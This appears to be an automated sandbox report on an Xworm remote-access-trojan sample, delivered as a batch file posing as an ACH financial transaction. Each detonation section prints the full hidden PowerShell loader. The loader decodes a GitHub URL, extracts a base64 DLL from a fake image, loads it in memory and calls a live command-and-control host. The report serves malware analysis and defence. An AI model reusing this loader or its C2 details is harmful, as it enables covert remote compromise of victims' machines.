Analysis Overview
SHA256
2aa9509682d45bc187eba3c951ec3841101779d1c93da418cbadbbf0c927c17d
Threat Level: Known bad
The file a6153d09a83cd3cf7391fa6bd817a8d7.zip was found to be: Known bad.
Malicious Activity Summary
Xworm
Xworm family
Detect Xworm Payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 22:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 22:23
Reported
2024-10-29 22:26
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\trombetada.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\trombetada.bat | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3004 wrote to memory of 2680 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3004 wrote to memory of 2680 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3004 wrote to memory of 2680 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\OPERACIÓN DE TRANSACCIÓN FINANCIERA ACH.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9naXRodWIuY29tL0NyeXB0ZXJzQW5kVG9vbHMvVXBsb2FkL2Jsb2IvbWFpbi9uZXdfaW1hZ2UuanBnP3Jhdz10cnVl'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('joseamayaaa.chickenkiller.com', '1996');"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
memory/2680-6-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp
memory/2680-7-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
memory/2680-8-0x0000000002890000-0x0000000002898000-memory.dmp
memory/2680-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2680-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2680-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 22:23
Reported
2024-10-29 22:26
Platform
win10v2004-20241007-en
Max time kernel
136s
Max time network
175s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\trombetada.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\trombetada.bat | C:\Windows\system32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1944 wrote to memory of 4984 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1944 wrote to memory of 4984 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OPERACIÓN DE TRANSACCIÓN FINANCIERA ACH.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9naXRodWIuY29tL0NyeXB0ZXJzQW5kVG9vbHMvVXBsb2FkL2Jsb2IvbWFpbi9uZXdfaW1hZ2UuanBnP3Jhdz10cnVl'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('joseamayaaa.chickenkiller.com', '1996');"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | joseamayaaa.chickenkiller.com | udp |
| CO | 179.14.10.239:1996 | joseamayaaa.chickenkiller.com | tcp |
| US | 8.8.8.8:53 | 239.10.14.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/4984-2-0x00007FFDBE8A3000-0x00007FFDBE8A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hccnzkfu.254.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4984-13-0x00007FFDBE8A0000-0x00007FFDBF361000-memory.dmp
memory/4984-12-0x000002739EDA0000-0x000002739EDC2000-memory.dmp
memory/4984-14-0x00007FFDBE8A0000-0x00007FFDBF361000-memory.dmp
memory/4984-15-0x00007FFDBE8A3000-0x00007FFDBE8A5000-memory.dmp
memory/4984-16-0x00007FFDBE8A0000-0x00007FFDBF361000-memory.dmp
memory/4984-17-0x000002739EA80000-0x000002739EC9C000-memory.dmp
memory/4984-18-0x00007FFDBE8A0000-0x00007FFDBF361000-memory.dmp
memory/4984-19-0x000002739F1C0000-0x000002739F4B2000-memory.dmp